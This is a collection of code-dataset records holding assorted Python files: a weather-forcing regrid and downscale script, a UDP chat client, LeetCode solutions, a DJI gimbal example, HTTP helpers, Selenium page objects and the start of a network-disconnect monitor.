forcing_config_label = \"Short_Range\"\n logging = whf.initial_setup(parser,forcing_config_label)\n\n\n # Extract the date, model run time, and forecast hour from the file name\n # Use the fcsthr to process only the files that have a fcst hour less than\n # the max fcst hr defined in the param/config file.\n \n \n # Convert the action to lower case \n # and the product name to upper case\n # for consistent checking\n action_requested = action.lower()\n product_data_name = prod.upper()\n if action == 'regrid': \n # Get the finished directory locations for the relevant product.\n if prod == 'RAP':\n regridded_dir = parser.get('regridding', 'RAP_output_dir')\n downscale_dir = parser.get('downscaling', 'RAP_downscale_output_dir')\n finished_downscale_dir = parser.get('downscaling', 'RAP_finished_output_dir')\n downscale_input_dir = parser.get('downscaling', 'RAP_data_to_downscale')\n \n elif prod == 'HRRR':\n regridded_dir = parser.get('regridding', 'HRRR_output_dir')\n downscale_dir = parser.get('downscaling', 'HRRR_downscale_output_dir')\n finished_downscale_dir = parser.get('downscaling', 'HRRR_finished_output_dir')\n downscale_input_dir = parser.get('downscaling', 'HRRR_data_to_downscale')\n\n\n (date,modelrun,fcsthr) = whf.extract_file_info(file)\n # Determine whether this current file lies within the forecast range\n # for the data product (e.g. if processing RAP, use only the 0hr-18hr forecasts).\n # Skip if this file has a forecast hour greater than the max indicated in the \n # parm/config file.\n in_fcst_range = whf.is_in_fcst_range(prod, fcsthr, parser)\n\n if in_fcst_range:\n # Check for RAP or GFS data products. If this file is\n # a 0 hr fcst and is RAP or GFS, substitute each 0hr forecast\n # with the file from the previous model run and the same valid\n # time. This is necessary because there are missing variables\n # in the 0hr forecasts (e.g. precip rate for RAP and radiation\n # in GFS).\n \n logging.info(\"Regridding and Downscaling for %s\", product_data_name)\n # Determine if this is a 0hr forecast for RAP data (GFS is also missing\n # some variables for 0hr forecast, but GFS is not used for Short Range\n # forcing). We will need to substitute this file for the downscaled\n # file from a previous model run with the same valid time. \n # We only need to do this for downscaled files, as the Short Range \n # forcing files that are regridded always get downscaled and we don't want\n # to do this for both the regridding and downscaling.\n if fcsthr == 0 and prod == 'RAP':\n logging.info(\"Regridding, ignoring f0 RAP files \" )\n regridded_file = whf.regrid_data(product_data_name, file, parser, True)\n\n # Downscaling...\n stat= whf.downscale_data(product_data_name,regridded_file, parser, True, True)\n if (stat == 0):\n # Move the finished downscaled file to the \"finished\" area so the triggering\n # script can determine when to layer with other data.\n match = re.match(r'.*/([0-9]{10})/([0-9]{12}.LDASIN_DOMAIN1.nc)',regridded_file)\n if match:\n downscaled_dir = finished_downscale_dir + \"/\" + match.group(1)\n input_dir = downscale_dir + \"/\" + match.group(1)\n if not os.path.exists(downscaled_dir):\n whf.mkdir_p(downscaled_dir)\n downscaled_file = downscaled_dir + \"/\" + match.group(2)\n input_file = input_dir + \"/\" + match.group(2)\n whf.move_to_finished_area(parser, prod, input_file) \n else:\n logging.error(\"FAIL- cannot move finished file: %s\", regridded_file) \n return \n else:\n logging.error(\"FAIL dould not downscale data for hour 0 RAP\")\n # Remove empty 0hr regridded file if it still exists\n if os.path.exists(regridded_file):\n cmd = 'rm -rf ' + regridded_file\n status = os.system(cmd)\n if status != 0:\n logging.error(\"ERROR: Failure to remove empty file: \" + regridded_file)\n return\n\n else:\n regridded_file = whf.regrid_data(product_data_name, file, parser, False)\n # Downscaling...\n whf.downscale_data(product_data_name,regridded_file, parser,True, False) \n # Move the downscaled file to the finished area.\n # Move the downscaled file to the finished location \n match = re.match(r'.*/([0-9]{10})/([0-9]{12}.LDASIN_DOMAIN1.nc)',regridded_file)\n if match:\n full_dir = finished_downscale_dir + \"/\" + match.group(1)\n input_dir = downscale_dir + \"/\" + match.group(1)\n full_input_file = input_dir + \"/\" + match.group(2)\n full_finished_file = full_dir + \"/\" + match.group(2)\n if not os.path.exists(full_dir):\n logging.info(\"finished dir doesn't exist, creating it now...\")\n whf.mkdir_p(full_dir)\n logging.info(\"Moving now, source = %s\", full_input_file)\n whf.move_to_finished_area(parser, prod, full_input_file)\n #whf.move_to_finished_area(parser, prod, full_finished_file)\n else:\n logging.error(\"FAIL- cannot move finished file: %s\", full_finished_file) \n return\n\n else:\n # Skip processing this file, exiting...\n logging.info(\"INFO [Short_Range_Forcing]- Skip processing, requested file is outside max fcst\")\n elif action_requested == 'layer':\n logging.info(\"Layering requested for %s and %s\", prod, prod2)\n # Do some checking to make sure that there are two data products \n # and two files indicated.\n if prod2 is None:\n logger.error(\"ERROR [Short_Range_Forcing]: layering requires two products\")\n return\n elif file2 is None:\n logger.error(\"ERROR [Short_Range_Forcing]: layering requires two input files\")\n return\n else:\n # We have everything we need, request layering\n whf.layer_data(parser,file, file2, prod, prod2, 'Short_Range')\n whf.rename_final_files(parser,'Short_Range')\n \n elif action_requested == 'bias':\n logging.info(\"Bias correction requested for %s\", file)\n logging.info(\"Bias correction not suppoted for Short Range Forcing\")\n \n\n\n\n \n \n#-------------------------- \n \n \nif __name__ == \"__main__\":\n forcing()\n \n\n","sub_path":"scripts/Python/Short_Range_Forcing.py","file_name":"Short_Range_Forcing.py","file_ext":"py","file_size_in_byte":9444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"653575726","text":"import threading\nimport time\nimport socket\nimport select\n#create a lock for the thread\ntLock = threading.Lock()\n#we will use the varuable for exiting the program\nexiting = False\n\n\ndef receving(name, sock):\n while not exiting:\n try:\n tLock.acquire()\n while True:\n data, addr = sock.recvfrom(1024)\n print(str(data).encode(\"UTF-8\"))\n except:\n pass\n #release the thread lock regardless\n finally:\n tLock.release()\n\nhost = '127.0.0.1'\nport = 0\n\nserver = ('127.0.0.1', 5000)\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.bind((host, port))\ns.setblocking(0)\n\n#creating a receiving thread\nrT = threading.Thread(target=receving, args=(\"recvThread\", s))\nrT.start()\n\nusername = input('How would you like to be called? \\n')\nmessage = input(username +\": \")\n\nwhile message != 'e':\n # check if the message is empty or not\n if message != '':\n sendmessage = username + \": \" + message\n s.sendto(sendmessage.encode('UTF-8'), server)\n tLock.acquire()\n message = input(username + \": \\n\")\n # release the lock\n tLock.release()\n time.sleep(0.2)\n\nexiting = True\nrT.join()\ns.close()\n","sub_path":"s/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"63415483","text":"class Solution(object):\n def isSameTree(self, p, q):\n stack = [(p, q)]\n while stack:\n node1, node2 = stack.pop()\n if node1 and node2 and node1.val == node2.val:\n stack += [(node1.left, node2.left)]\n stack += [(node1.right, node2.right)]\n else:\n if node1 != node2:\n return False\n return True\n","sub_path":"100/100.same-tree.260745769.Accepted.leetcode.py","file_name":"100.same-tree.260745769.Accepted.leetcode.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"615621154","text":"\"\"\"\n문제:\n Given an array of integers nums and an integer target, return indices of the two numbers such that they add up to target.\n\n You may assume that each input would have exactly one solution, and you may not use the same element twice.\n\n You can return the answer in any order.\n\n제한:\n 2 <= nums.length <= 104\n -109 <= nums[i] <= 109\n -109 <= target <= 109\n Only one valid answer exists.\n입력:\n -\n출력:\n -\n시작:\n 9.15 01:50\n소요시간:\n 15분\n\"\"\"\nfrom typing import List\n\n# O(N^2)이하로 만들어보자.\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n dict = {}\n for i, num in enumerate(nums):\n dict[num] = i\n\n for i, num in enumerate(nums):\n if target-num in dict and i != dict[target-num]:\n return [i, dict[target-num]]","sub_path":"Codesik/linear_data_structure/LTC_two_sum.py","file_name":"LTC_two_sum.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"489636469","text":"import time\nfrom dji_asdk_to_python.products.aircraft import Aircraft\n\n\nAPP_IP = \"192.168.0.109\"\n\ndrone = Aircraft(APP_IP)\ngimbal = drone.getGimbal()\n\n\nfor i in range(10):\n print(\"iteration %s\" % i)\n if i % 2 == 0:\n gimbal.rotate(pitch=-90, roll=0, yaw=0)\n else:\n gimbal.rotate(pitch=0, roll=0, yaw=0)\n time.sleep(2)\n","sub_path":"examples/rotate_gimbal.py","file_name":"rotate_gimbal.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"123604710","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom http import client\nimport requests\nfrom requests.adapters import HTTPAdapter\n\nlogger = logging.getLogger(__name__)\n\nclient.HTTPConnection._http_vsn=11\nclient.HTTPConnection._http_vsn_str='HTTP/1.1'\n\n\ndef get_http_session():\n http_session = requests.Session()\n http_session.mount('http://', HTTPAdapter(pool_connections=100, pool_maxsize=100, max_retries=3))\n http_session.mount('https://', HTTPAdapter(pool_connections=100, pool_maxsize=100, max_retries=3))\n return http_session\n\ndef request_get(http_session, url, headers=None):\n logger.info(\"HTTP GET: {}\".format(url))\n return http_session.get(url, headers=headers, timeout=(5, 15))\n\ndef request_post(http_session, url, data=None, json=None):\n logger.info(\"HTTP POST: {}\".format(url))\n return http_session.post(url=url, data=data, json=json, timeout=(5, 15))","sub_path":"zvt/utils/request_utils.py","file_name":"request_utils.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"30918887","text":"from tests.personal_data.page_component import Page, Component\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n\nclass MainForm(Component):\n PERSONAL_DATA = '//*[@data-test-id=\"personal-card\"]//*[@data-test-id=\"card-footer\"]'\n CONTACTS = '//*[@data-test-id=\"contacts-card\"]//*[@data-test-id=\"card-footer\"]'\n PERSONAL_DATA_CONTAINER = '//*[@data-test-id=\"mailid-profile-container\"]'\n CONTACTS_CONTAINER = '//*[@data-test-id=\"mailId-contacts-wrapper\"]'\n\n def open_contacts(self):\n contacts_link = WebDriverWait(self.driver, 30, 0.1).until(\n lambda d: d.find_element_by_xpath(self.CONTACTS)\n )\n\n contacts_link.click()\n\n def open_personal_data(self):\n personal_data_link = WebDriverWait(self.driver, 30, 0.1).until(\n lambda d: d.find_element_by_xpath(self.PERSONAL_DATA)\n )\n\n personal_data_link.click()\n\n def check_personal_data_opened(self):\n WebDriverWait(self.driver, 30, 0.1).until(\n lambda d: d.find_element_by_xpath(self.PERSONAL_DATA_CONTAINER)\n )\n\n def check_contacts_opened(self):\n WebDriverWait(self.driver, 30, 0.1).until(\n lambda d: d.find_element_by_xpath(self.CONTACTS_CONTAINER)\n )\n\n\nclass MainPage(Page):\n PATH = ''\n\n @property\n def form(self):\n return MainForm(self.driver)\n","sub_path":"tests/personal_data/src/main_page.py","file_name":"main_page.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"28275650","text":"\n\n\n# Given a m x n grid filled with non-negative numbers, find a path from top left to bottom right which minimizes the sum of all numbers along its path.\n# You can only move either down or right at any point in time.\n\nclass Solution:\n \"\"\"\n @param grid: a list of lists of integers\n @return: An integer, minimizes the sum of all numbers along its path\n \"\"\"\n def minPathSum(self, grid):\n # write your code here\n # 1D-DP\n m, n = len(grid), len(grid[0])\n dp = [0] * n\n dp[0] = grid[0][0]\n for j in range(1, n):\n dp[j] = dp[j - 1] + grid[0][j]\n \n for i in range(1, m):\n dp[0] += grid[i][0]\n for j in range(1, n):\n dp[j] = min(dp[j - 1], dp[j]) + grid[i][j]\n \n return dp[n - 1]","sub_path":"Minimum Path Sum.py","file_name":"Minimum Path Sum.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"451399482","text":"import itertools\nimport json\nfrom dataclasses import dataclass\nfrom typing import Dict\n\nfrom cloudshell.cp.core.request_actions import models\n\n\n@dataclass\nclass DeployedVMActions:\n REGISTERED_DEPLOYMENT_PATH_MODELS = {} # type: Dict[str, models.DeployedApp]\n deployed_app: models.DeployedApp = None\n\n @classmethod\n def register_deployment_path(cls, deployment_path_cls):\n \"\"\"Register deployment path class.\n\n :param cloudshell.cp.core.models.DeployedApp deployment_path_cls:\n :return:\n \"\"\"\n cls.REGISTERED_DEPLOYMENT_PATH_MODELS[\n deployment_path_cls.DEPLOYMENT_PATH\n ] = deployment_path_cls\n\n @classmethod\n def from_data(cls, app_request_data, deployed_app_data, cs_api):\n \"\"\"Create DeployedApp from the dictionaries.\n\n :param dict|None app_request_data: in the static App app_request is empty\n :param dict deployed_app_data:\n :param cloudshell.api.cloudshell_api.CloudShellAPISession cs_api:\n :rtype: DeployedVMActions\n \"\"\"\n model = deployed_app_data[\"model\"]\n app_request_attrs = {}\n deployment_service_model = model\n if app_request_data:\n app_request_attrs = app_request_data[\"deploymentService\"][\"attributes\"]\n deployment_service_model = app_request_data[\"deploymentService\"][\"model\"]\n attributes = {\n attr[\"name\"]: attr[\"value\"]\n for attr in itertools.chain(\n deployed_app_data[\"attributes\"],\n app_request_attrs,\n )\n }\n\n deployed_app_cls = cls.REGISTERED_DEPLOYMENT_PATH_MODELS.get(\n deployment_service_model, models.DeployedApp\n )\n\n deployed_app = deployed_app_cls(\n family=deployed_app_data[\"family\"],\n model=model,\n name=deployed_app_data[\"name\"],\n cs_api=cs_api,\n deployment_service_model=deployment_service_model,\n private_ip=deployed_app_data[\"address\"],\n attributes=attributes,\n vmdetails=models.VMDetails.from_dict(deployed_app_data[\"vmdetails\"]),\n )\n\n return cls(deployed_app=deployed_app)\n\n @classmethod\n def from_remote_resource(cls, resource, cs_api):\n \"\"\"Create DeployedApp from the resource.\n\n :param cloudshell.api.cloudshell_api.CloudShellAPISession cs_api:\n :param cloudshell.shell.core.driver_context.ResourceContextDetails resource:\n :rtype: DeployedVMActions\n \"\"\"\n app_request_json = resource.app_context.app_request_json\n app_request_data = json.loads(app_request_json) if app_request_json else None\n return cls.from_data(\n app_request_data=app_request_data,\n deployed_app_data=json.loads(resource.app_context.deployed_app_json),\n cs_api=cs_api,\n )\n","sub_path":"cloudshell/cp/core/request_actions/deployed_vm.py","file_name":"deployed_vm.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"67387770","text":"import random\n\nfrom project.windows.cloppy_window import CloppyButtonWindow\nfrom project.windows.cloppy_window_events import CloppyChoiceMadeEventData\n\nfrom project.windows.editor_window_events import NewWordEventData\n\nfrom project.spelling.correction import correction\nfrom project.spelling.misspell import misspell\n\n\nclass CloppySpellingWindow(CloppyButtonWindow):\n \"\"\"\n This class represents individual Cloppy windows used to suggest spelling\n corrections to the user.\n \"\"\"\n def __init__(self, master, word_data: NewWordEventData):\n \"\"\"\n :param master: The dialog's master widget. Should be an EditorWindow.\n :param word_data: Object containing information regarding the starting\n index, ending index and contents of the word to be\n corrected.\n \"\"\"\n super().__init__(master)\n\n self.word = word_data.word.lower()\n self.start = word_data.start\n self.end = word_data.end\n\n self.set_message(\n f\"Looks like the word '{word_data.word}' could be a \"\n \"misspelling.\\n\"\n \"Below are some suggested corrections.\\n\"\n \"If you don't pick one within 10 seconds I'll pick one for you,\\n\"\n \"to save you time. :)\"\n )\n\n # Generate a correction to the word.\n corrected_word = correction(self.word)\n\n self.suggestions = [corrected_word]\n\n # Generate up to 3 misspellings of the corrected word.\n for i in range(3):\n suggestion = misspell(corrected_word, 3)\n if suggestion and suggestion not in self.suggestions:\n self.suggestions.append(suggestion)\n\n # Add all generated suggestions as choices.\n for suggestion in random.sample(\n self.suggestions, len(self.suggestions)\n ):\n self.add_choice(suggestion)\n\n self.set_time_limit(10)\n self.choice_made.add_callback(self.replace_word)\n\n def replace_word(self, choice_data: CloppyChoiceMadeEventData):\n \"\"\"\n Called when the user makes a choice in this dialog.\n\n :param choice_data: Object containing information about the user's\n choice.\n \"\"\"\n self.master.set_text(\n choice_data.choice, self.start, self.end\n )\n\n def time_out(self):\n \"\"\"\n Called when the user fails to select a choice within the time limit.\n \"\"\"\n self.make_choice(random.choice(self.suggestions))\n","sub_path":"project/windows/cloppy_spelling_window.py","file_name":"cloppy_spelling_window.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"647807751","text":"class Solution(object):\n def numMatchingSubseq(self, S, words):\n ans = 0\n heads = [[] for _ in xrange(26)]\n for word in words:\n it = iter(word)\n heads[ord(next(it)) - ord('a')].append(it)\n\n for letter in S:\n letter_index = ord(letter) - ord('a')\n old_bucket = heads[letter_index]\n heads[letter_index] = []\n\n while old_bucket:\n it = old_bucket.pop()\n nxt = next(it, None)\n if nxt:\n heads[ord(nxt) - ord('a')].append(it)\n else:\n ans += 1\n\n return ans\n","sub_path":"algorithms/problem_0792/leetcode.py","file_name":"leetcode.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"156932628","text":"\"\"\"\nSets the has_extra_chords value on existing songs.\n\"\"\"\n\nfrom django.core.exceptions import ValidationError\nfrom django.core.management.base import BaseCommand\n\n\nclass Command(BaseCommand):\n help = \"Runs full_clean on all songs to properly set has_extra_chords.\"\n\n def handle(self, *args, **options):\n from songs.models import Song\n for song in Song.objects.all():\n if song.lyrics:\n before = song.has_extra_chords\n song.full_clean()\n song.save()\n after = song.has_extra_chords\n print(\"%s: %s -> %s\" % (song, before, after,))\n","sub_path":"songs/management/commands/set_has_extra_on_songs.py","file_name":"set_has_extra_on_songs.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"495311530","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('account', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='customuser',\n name='following',\n field=models.ManyToManyField(blank=True, null=True, related_name='followers', to=settings.AUTH_USER_MODEL),\n ),\n migrations.AlterField(\n model_name='customuser',\n name='profile_pic',\n field=models.ImageField(upload_to='profile_pics/', blank=True, null=True),\n ),\n ]\n","sub_path":"account/migrations/0002_auto_20151202_1430.py","file_name":"0002_auto_20151202_1430.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"495884510","text":"import ccxt\nfrom ..base.api import ApiBase\n\nccxt_binance = ccxt.binance()\nccxt_binance.load_markets()\n\n\nclass BinanceApi(ApiBase, ccxt.binance):\n def __init__(self, ccxt_config):\n ApiBase.__init__(self)\n ccxt.binance.__init__(self, ccxt_config)\n self.future = self.options.get('defaultType') == 'future'\n\n def listen_key(self, method='POST'):\n # POST: create new\n # PUT: keep alive (every 30 minutes)\n # DELETE: close\n if self.future:\n return self.request('listenKey', 'fapiPrivate', method)\n else:\n return self.request('userDataStream', 'v3', method)\n","sub_path":"botfw/binance/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"251128624","text":"import pandas as pd\nfrom PIL import Image\n\ncounter = 0\ndef getImgSize(path):\n global counter\n counter += 1\n print(counter)\n #print(Image.open(str(path)).size)\n return Image.open(str(path)).size\n\ndef saveData(df):\n with open(\"image_sizes.csv\", \"w\") as writeFile:\n df.to_csv(writeFile, index = False)\n writeFile.close()\ndef getSize(tup):\n return tup[0] * tup[1]\n\ndef main():\n #images = \"./existing_image.csv\"\n images = \"./image_sizes.csv\"\n pd.set_option('display.max_colwidth', -1)\n df = pd.read_csv(images, header = 0)\n print(df[\"SIZE\"].mean())\n print(df[df[\"SIZE\"] == df[\"SIZE\"].min()])\n print(df[df[\"SIZE\"] == df[\"SIZE\"].max()])\n #row = df.sample(n = 1).reset_index(drop = True)\n # df[\"DIM\"] = df[\"IMG\"].apply(getImgSize)\n # df[\"SIZE\"] = df[\"DIM\"].apply(getSize)\n# df[\"IMG_DIMS\"] = df[\"IMG\"].apply(getImgSize)\n print(df)\n# saveData(df)\nif __name__ == \"__main__\":\n main()\n# filename = os.path.join('path', 'to', 'image', 'file')\n# img = Image.open(filename)\n# print img.size\n","sub_path":"check_img_size.py","file_name":"check_img_size.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"269034719","text":"#NEED - VITAL\nfrom Myro import *\n\n#import file - MUST use the file name + \".jpg\" otherwise will not be able to call up correct file\nfilename = \"your.jpg\"\n\n#creates function = makes picture (takes in each pixel of the imported picture)\n#\"pic\" is the name of the function\n#\"makePicture\" is an already-predefined function in this program, it takes in each pixel of the imported picture file)\n#\"filename\" is a PARAMETER, this parameter calls up the variable \"filename\" and what was stored in it, in our case,\n# is the called up file \"Revs.jpg\"\npic = makePicture(filename)\n#show(pic) displays the image\nshow(pic)\n#check - play it, see if it works\n\n#set colors to variables, assigns the RGB characteristics of a color to a \"color\" variable\n#KEEP THESE THE SAME FOR ALL and give everyone these numbers (write on whiteboard or something...)\nDarkBlue = makeColor(0,51,76)\nRed = makeColor(217,26,33)\nBlue = makeColor(112,150,158)\nYellow = makeColor(252, 227, 166)\n\n#set color\n\n#\"pixelList\" is a function that goes through the pixels one more time\n#\"getPixels\" is a predefined function\n#\"(pic)\" is a parameter of the \"getPixels\" function and calls up our image - \"Revs.jpg\"\npixelList = getPixels(pic)\n\n#a for loop that goes through every pixel in the pixelList function; goes through each pixel in our image\nfor pixel in pixelList:\n\n #gets the (R,G,B) value of EACH pixel\n #\"getRed\", \"getGreen\", \"getBlue\" are all predefined functins\n #\"(pixel)\" is a parameter of each function that calls up each pixel in the image\n r = getRed(pixel)\n g = getGreen(pixel)\n b = getBlue(pixel)\n\n #if R or G or B values of a pixel are HIGHER than 180, then sets color to yellow\n if r > 180 or g > 180 or b > 180:\n setColor(pixel, Yellow)\n\n #else, if R or G or B values of a pixel are HIGHER than 120, then sets color to blue\n elif r > 120 or g > 120 or b > 120:\n setColor(pixel, Blue)\n\n #else, if R or G or B values of a pixel are HIGHER than 60, then sets color to red\n elif r > 60 or g > 60 or b > 60:\n setColor(pixel, Red)\n\n #else, if R or G or B values of a pixel are HIGHER than 0, then sets color to dark blue\n elif r > 0 or g > 0 or b > 0:\n setColor(pixel, DarkBlue)\n\n#SHOW PIC\n#saves image to the same folder under the name \"RevsObamafied.jpg\"\n#they can change the name \"RevsObamafied\" to whatever name but MUST keep the \".jpg\"\n#they can keep the \"Obamafied\" part of name to prevent from overwritting the image over the original\nsavePicture(pic, \"newyour.jpg\")\n#hit the GREEN circle button at the top to run the program\n#screen with image will pop up, wait until the entire picture Obamafies and then look it up in your folder\n#larger pictures take more time... wait until RED dot turns GREEN => image is done\n#if their images did not turn out too well - less contrast than preffered, then tell them to change/play with the \"if\"/\"elif\" function numbers\n#thanks guys! Really appreciate your help! ^.^ ~Revs, USSR\n","sub_path":"Obamafication.py","file_name":"Obamafication.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"550457759","text":"# Copyright 2012 Google Inc. All Rights Reserved.\n\n\"\"\"Representation for an Earth Engine ImageCollection.\"\"\"\n\n\n\n# Dont bug me about the invalid names; it's on purpose.\n#pylint: disable-msg=C6409\n\nimport collections\nimport copy\n\nimport collection\nimport ee_exception\nimport image\nimport serializer\n\n\nclass ImageCollection(collection.Collection):\n \"\"\"Representation for an Earth Engine ImageCollection.\"\"\"\n\n def __init__(self, args): # pylint: disable-msg=W0231\n \"\"\"ImageCollection constructor.\n\n Args:\n args: ImageCollections can be constructed from the following arguments:\n A string: the asset ID of an image collection,\n An iterable of images, or anything that can be used to construct\n an image (ids, constants, etc).\n A single image.\n A dictionary: a collections's JSON description.\n\n Raises:\n EEException: if passed something other than the above.\n \"\"\"\n if isinstance(args, image.Image):\n args = [args]\n\n if isinstance(args, basestring):\n # Get an asset by AssetID\n args = {'type': 'ImageCollection', 'id': args}\n elif isinstance(args, dict): # Must check for dict before iterable.\n args = copy.deepcopy(args)\n elif isinstance(args, collections.Iterable):\n # A manually created collection.\n args = {'type': 'ImageCollection',\n 'images': [image.Image(x) for x in args]}\n elif isinstance(args, collection.Collection):\n args = copy.deepcopy(args._description) # pylint: disable-msg=W0212\n else:\n raise ee_exception.EEException('Unrecognized constructor argument.')\n\n self._description = args\n\n def getMapId(self, vis_params):\n \"\"\"Fetch and return a MapID.\n\n This mosaics the collection to a single image and return a mapid suitable\n for building a Google Maps overlay.\n\n Args:\n vis_params: The visualization parameters.\n\n Returns:\n A mapid and token.\n \"\"\"\n return self.mosaic().getMapId(vis_params)\n\n def mosaic(self):\n \"\"\"Wrap this collection in a SimpleMosaic function.\"\"\"\n return image.Image({'creator': 'SimpleMosaic', 'args': [self]})\n\n def combine(self, other):\n \"\"\"Combine two ImageCollections by ID, merging bands.\n\n The collection contains one image for each image in this collection\n merged with the bands from any matching images in the other collection.\n\n Args:\n other: The second collection.\n\n Returns:\n The combined collection.\n \"\"\"\n return ImageCollection({\n 'algorithm': 'CombineCollectionBands',\n 'primary': self,\n 'secondary': other\n })\n\n def map(self,\n algorithm,\n opt_dynamicArgs=None,\n opt_constantArgs=None,\n opt_destination=None):\n \"\"\"Maps an algorithm over a collection. See ee.Collection.mapInternal().\"\"\"\n return self.mapInternal(image.Image, algorithm,\n opt_dynamicArgs, opt_constantArgs, opt_destination)\n\n def __str__(self):\n \"\"\"Writes out the collection in a human-readable form.\"\"\"\n return 'ImageCollection(%s)' % serializer.toJSON(self._description)\n\n def __repr__(self):\n \"\"\"Writes out the collection in an eval-able form.\"\"\"\n return 'ee.ImageCollection(%s)' % self._description\n","sub_path":"src/packages/ee/imagecollection.py","file_name":"imagecollection.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"614403218","text":"from copy import deepcopy\n\nclass Solution(object):\n def findCheapestPrice(self, n, flights, src, dst, K):\n \"\"\"\n :type n: int\n :type flights: List[List[int]]\n :type src: int\n :type dst: int\n :type K: int\n :rtype: int\n \"\"\"\n int_max = 0x7fffffff\n m = [[int_max for _ in range(n)] for _ in range(n)]\n for f in flights:\n m[f[0]][f[1]] = f[2]\n dp = [[int_max for _ in range(n)] for _ in range(n)]\n for i in range(n):\n dp[src][i] = m[src][i]\n for i in range(K):\n old = deepcopy(dp[src])\n for j in range(n):\n if dp[src][j] < int_max:\n for k in range(n):\n if m[j][k] < int_max:\n dp[src][k] = min(dp[src][k], old[j] + m[j][k])\n return dp[src][dst] if dp[src][dst] < int_max else -1\n","sub_path":"normal/787_cheapest_flights_within_k_stops.py","file_name":"787_cheapest_flights_within_k_stops.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"338447664","text":"class Calculator:\n def __init__(self):\n pass\n\n def power(self, number, exponent):\n if number < 0 or exponent < 0:\n raise ValueError(\"n and p should be non-negative\")\n return pow(number, exponent)\n\n\ndef read_number_pairs():\n number_lines = int(input())\n for _ in range(number_lines):\n yield map(int, input().split())\n\n\ndef solve(base, exponent):\n my_calculator = Calculator()\n try:\n ans = my_calculator.power(base, exponent)\n print(ans)\n except ValueError as error:\n print(error)\n\n\nif __name__ == \"__main__\":\n for n, p in read_number_pairs():\n solve(n, p)\n","sub_path":"30days-of-code/17_exceptions2.py","file_name":"17_exceptions2.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"212982447","text":"def calc_avarage(numbers):\n sumx = 0\n for i in numbers:\n sumx += i\n return sumx / len(numbers)\n\n\nif __name__ == \"__main__\":\n list_1 = [10, 12, 65, 5, 4, 53, 42]\n print('avarage of', list_1,'=', calc_avarage(list_1))\n","sub_path":"lesson2/average.py","file_name":"average.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"70305559","text":"from ptna import *\r\n\r\n#実行ブロック#\r\n\r\ndef prompt(obj):\r\n return obj.get_name() + \":\" + obj.get_responder_name() + \"> \"\r\n\r\nprint(\"Ptna System prototype : ptna\")\r\nptna = Ptna(\"pyna\")\r\n\r\nwhile True:\r\n inputs = input(\" > \")\r\n if not inputs:\r\n print(\"バイバイ\")\r\n break\r\n response = ptna.dialogue(inputs)\r\n print(prompt(ptna), response)","sub_path":"1809/180921/prototype.py","file_name":"prototype.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"153994552","text":"\"\"\"\r\nV3: Added date support and sound on error. Added default gateway finder instead of typing it in.\r\nV3.1: Added a last disconnect. \r\nv3.2: Added a one time line that shows the date. Optimized code. Fixed bugs. Added a small debug screen.\r\n\"\"\"\r\n\r\n\r\nimport win32api, win32con\r\nimport os, re\r\nimport time\r\nimport subprocess\r\n\r\nprevNums = []\r\nmanagerNumber = 0\r\nrecentDisconnectTime = ''\r\ndateString = ''\r\n# TODO random crashes. Add an except statment for debug. Or keywait()\r\n\r\n# FIXME Records an error once before sleep.\r\n# 